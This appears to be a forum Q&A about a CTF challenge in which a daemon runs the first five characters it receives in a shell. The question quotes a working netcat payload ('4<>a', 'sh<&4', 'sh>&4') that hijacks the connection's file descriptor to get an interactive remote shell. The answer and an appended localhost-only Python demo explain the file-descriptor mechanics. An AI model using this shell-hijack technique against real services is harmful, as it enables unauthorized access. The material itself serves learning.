"Hacking" a way to a remote shell in 5 characters [closed]

This weekend, there was a CTF wargame happening, Secuinside CTF 2013 ( http://war.secuinside.com/ )

Being a computer security enthusiast, I took a look at the challenges, and at their solutions after the CTF was over.

One of the challenges was about getting a remote shell on a server, given that a daemon called "givemeshell" is running on this server. What the daemon does is keep a socket open on a chosen port, let's say port 12345.

When the socket receives something, the daemon takes the first 5 chars and launches them in a shell.

For example, if I send cat file, the daemon will launch the command cat f in a shell. No response is sent, so I can't know the result of the command.

The objective is to read a file containing the flag.

Now, someone gave me this solution:

$ nc 1.2.3.4 12345
4<>a

$ nc 1.2.3.4 12345
sh<&4
sh>&4
cat flag
The flag is _FLAG_

I tested this solution and it works. But after spending several hours trying to understand it, I still can't figure out what it does and why it works. I understand this is about redirecting something...

Can someone explain it to me? Thanks!

J.-B. C. asked May 27 '13 12:05


1 Answer

4 is your connection's file descriptor.

0 is the program stdin, 1 is the program stdout, 2 is the program stderr, when you created a socket to listen for connections it was then assigned to 3, and when it accepted your connection, a new file descriptor of number 4 was created to handle this connection.

4 is the ID of the file descriptor of your connection to the backdoor, assuming you are the first one to connect.

You then type sh<&4. It opens sh and tells it that it should get all input directly from your connection.

Right now you are already in full control of the shell, because sh took over and every command you send is interpreted directly by it. But you still cannot see any output!

Then you type sh>&4 to open a new level of sh inside the other saying it should push all output to your file descriptor. The trick is done! Two-way communication.

Havenard answered Oct 17 '22 18:10
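As an added example (not part of the question or the answer above), the following Python script reproduces the two mechanics the answer relies on, entirely on localhost and a temporary file. The first function mimics the daemon's setup (a listening socket, then one accepted client played by a forked child) and checks the "lowest free descriptor" rule that makes the listening socket 3 and the first connection 4 in a process that only has stdin/stdout/stderr open. The second function opens a scratch file read/write on a descriptor N (the same thing `4<>a` does in the daemon's shell, except N is whatever is free here), feeds a shell its commands through `<&N` and writes a reply through `>&N`. The daemon name and the 5-character limit come from the question; the file contents, reply string and loopback port are constructed for the demo.

```python
"""Local demonstration of fd numbering and `<&N` / `>&N` redirection.

Nothing here contacts a remote host: the "client" is a forked child
connecting to 127.0.0.1, and the shell redirections target a temp file.
"""
import os
import socket
import subprocess
import tempfile


def lowest_free_fd() -> int:
    """Return the lowest unused descriptor number without keeping it open.

    dup() always hands out the lowest free number, which is the rule behind
    the answer's "listening socket is 3, first connection is 4" reasoning.
    """
    probe = os.dup(0)
    os.close(probe)
    return probe


def trace_daemon_fds() -> dict:
    """Mimic givemeshell's socket setup and record which fd numbers appear.

    In a fresh process with only 0/1/2 open this yields listener=3, conn=4;
    under a test harness that already holds extra descriptors the absolute
    numbers differ, but the predicted values still match.
    """
    out = {"predicted_listener": lowest_free_fd()}
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # port 0: the OS picks a free loopback port
    listener.listen(1)
    out["listener"] = listener.fileno()
    port = listener.getsockname()[1]

    pid = os.fork()
    if pid == 0:                         # child: connect once and leave, like `nc host port`
        client = socket.create_connection(("127.0.0.1", port))
        client.close()
        os._exit(0)

    out["predicted_conn"] = lowest_free_fd()
    conn, _ = listener.accept()          # in the daemon, this is the fd the shell gets redirected to
    out["conn"] = conn.fileno()
    os.waitpid(pid, 0)
    conn.close()
    listener.close()
    return out


def shell_redirect_demo(script: str = "echo hello via redirect\n",
                        reply: str = "reply written back") -> tuple:
    """Show `sh <&N` reading commands from fd N and `echo ... >&N` writing to it.

    The scratch file stands in for the connection; both subprocesses inherit
    descriptor N unchanged via pass_fds. Returns (shell stdout, file content).
    """
    fd, path = tempfile.mkstemp()        # opened read/write, like `N<>file`
    try:
        os.write(fd, script.encode())
        os.lseek(fd, 0, os.SEEK_SET)
        # `sh <&N`: the inner shell's stdin is fd N, so it executes the file's lines
        ran = subprocess.run(["sh", "-c", f"sh <&{fd}"], pass_fds=(fd,),
                             capture_output=True, text=True, check=True)
        # `>&N`: output sent to fd N lands in the same file (shared offset, now at EOF)
        subprocess.run(["sh", "-c", f"echo '{reply}' >&{fd}"],
                       pass_fds=(fd,), check=True)
        os.lseek(fd, 0, os.SEEK_SET)
        content = os.read(fd, 4096).decode()
    finally:
        os.close(fd)
        os.unlink(path)
    return ran.stdout, content


if __name__ == "__main__":
    print("fd numbers:", trace_daemon_fds())
    stdout, content = shell_redirect_demo()
    print("shell printed:", stdout, end="")
    print("file now holds:", repr(content))
```

Run it as a script and the first line shows the 3/4 pair from the answer (or higher numbers if your launcher left other descriptors open); the second function's file content ends with the reply line, which is the `>&4` half of the trick applied to a file instead of a socket.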